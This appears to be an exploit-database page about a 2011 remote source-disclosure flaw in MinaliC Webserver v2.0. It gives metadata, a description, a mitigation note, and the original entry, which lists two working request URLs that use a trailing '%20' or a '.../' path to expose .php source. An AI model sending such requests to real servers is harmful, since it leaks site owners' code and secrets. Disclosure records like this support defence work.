header-logo
Suggest Exploit
vendor:
MinaliC Webserver
by:
X-h4ck
7.5
CVSS
HIGH
Remote Source Disclosure
200
CWE
Product Name: MinaliC Webserver
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE: N/A
CPE: minalic:minalic_webserver
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 (Home Premium)
2011

MinaliC Webserver v2.0 Remote Source Disclosure

MinaliC Webserver v2.0 is vulnerable to remote source disclosure. An attacker can access the source code of the web application by sending a request to the web server with the file path of the source code. This can be done by appending '%20' or '.../' to the end of the URL.

Mitigation:

Ensure that the web server is configured to not allow directory browsing. Additionally, ensure that the web server is configured to not allow access to files with certain extensions, such as .php, .asp, .aspx, etc.
Source

Exploit-DB raw data:

# Exploit Title : MinaliC Webserver v2.0 Remote Source Disclosure
# Software link : http://sourceforge.net/projects/minalic/
# Version       : 2.0
# Tested on     : Windows 7 (Home Premium)
# Date          : 27/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email         : mem001@live.com
# Greetz        : mywisdom - Wulns~ - Danzel - IllyrianWarrior - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon 

(Directory browsing = Off)
http://localhost:8080/.../file.php (html) # Source Disclosure
http://localhost:8080/file.php%20  (html)

Navigation

Suggest Exploit

Services By CQR